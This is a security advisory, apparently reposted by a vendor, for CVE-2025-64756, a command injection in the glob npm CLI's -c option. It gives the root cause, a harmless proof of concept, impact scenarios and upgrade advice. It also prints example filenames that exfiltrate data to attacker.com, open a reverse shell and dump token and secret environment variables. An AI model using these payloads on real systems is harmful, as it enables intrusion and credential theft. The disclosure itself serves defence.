Summary
The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.
Details
Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
Technical Flow:
- User runs
glob -c <command> <pattern> - CLI finds files matching the pattern
- Matched filenames are collected into an array
- Command is executed with matched filenames as arguments using
shell: true - Shell interprets metacharacters in filenames as command syntax
- Malicious filenames execute arbitrary commands
Affected Component:
- CLI Only: The vulnerability affects only the command-line interface
- Library Safe: The core glob library API (
glob(),globSync(), streams/iterators) is not affected - Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)
Attack Surface:
- Files with names containing shell metacharacters:
$(), backticks,;,&,|, etc. - Any directory where attackers can control filenames (PR branches, archives, user uploads)
- CI/CD pipelines using
glob -con untrusted content
PoC
Setup Malicious File:
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
Trigger Vulnerability:
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
Result:
- The echo command executes normally
- Additionally: The
$(touch injected_poc)in the filename is evaluated by the shell - A new file
injected_pocis created, proving command execution - Any command can be injected this way with full user privileges
Advanced Payload Examples:
Data Exfiltration:
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
Reverse Shell:
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
Environment Variable Harvesting:
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
Affected Products
- Ecosystem: npm
- Package name: glob
- Component: CLI only (
src/bin.mts) - Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
- Introduced: v10.2.0 (first release with CLI containing
-c/--cmdoption) - Patched versions: 11.1.0and 10.5.0
Scope Limitation:
- Library API Not Affected: Core glob functions (
glob(),globSync(), async iterators) are safe - CLI-Specific: Only the command-line interface with
-c/--cmdoption is vulnerable
Impact
Arbitrary Command Execution:
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
Real-World Attack Scenarios:
1. CI/CD Pipeline Compromise:
- Malicious PR adds files with crafted names to repository
- CI pipeline uses
glob -cto process files (linting, testing, deployment) - Commands execute in CI environment with build secrets and deployment credentials
- Potential for supply chain compromise through artifact tampering
2. Developer Workstation Attack:
- Developer clones repository or extracts archive containing malicious filenames
- Local build scripts use
glob -cfor file processing - Developer machine compromise with access to SSH keys, tokens, local services
3. Automated Processing Systems:
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
4. Supply Chain Poisoning:
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
Platform-Specific Risks:
- POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
- Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
- Mixed Environments: CI systems often use Linux containers regardless of developer platform
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2025-64756 has a CVSS score of 7.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (11.1.0, 10.5.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
- Upgrade to
[email protected],[email protected], or higher, as soon as possible. - If any
globCLI actions fail, then convert commands containing positional arguments, to use the--cmd-arg/-goption instead. - As a last resort, use
--shellto maintainshell:truebehavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.
Frequently Asked Questions
- What is CVE-2025-64756? CVE-2025-64756 is a high-severity OS command injection vulnerability in glob (npm), affecting versions >= 11.0.0, < 11.1.0. It is fixed in 11.1.0, 10.5.0. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2025-64756? CVE-2025-64756 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of glob are affected by CVE-2025-64756? glob (npm) versions >= 11.0.0, < 11.1.0 is affected.
- Is there a fix for CVE-2025-64756? Yes. CVE-2025-64756 is fixed in 11.1.0, 10.5.0. Upgrade to this version or later.
- Is CVE-2025-64756 exploitable, and should I be worried? Whether CVE-2025-64756 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-64756 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-64756?
- Upgrade
globto 11.1.0 or later - Upgrade
globto 10.5.0 or later
- Upgrade